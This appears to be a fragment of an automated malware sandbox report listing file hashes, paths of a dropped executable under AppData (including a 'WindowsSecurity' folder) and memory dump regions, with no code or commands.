SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Vfd663501e1ac13eb331505b8388e675450.exe.log

MD5 3308a84a40841fab7dfec198b3c31af7
SHA1 4e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA512 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

memory/408-11-0x00007FFF54460000-0x00007FFF54F21000-memory.dmp

memory/408-12-0x00000214C7EE0000-0x00000214C7EF0000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301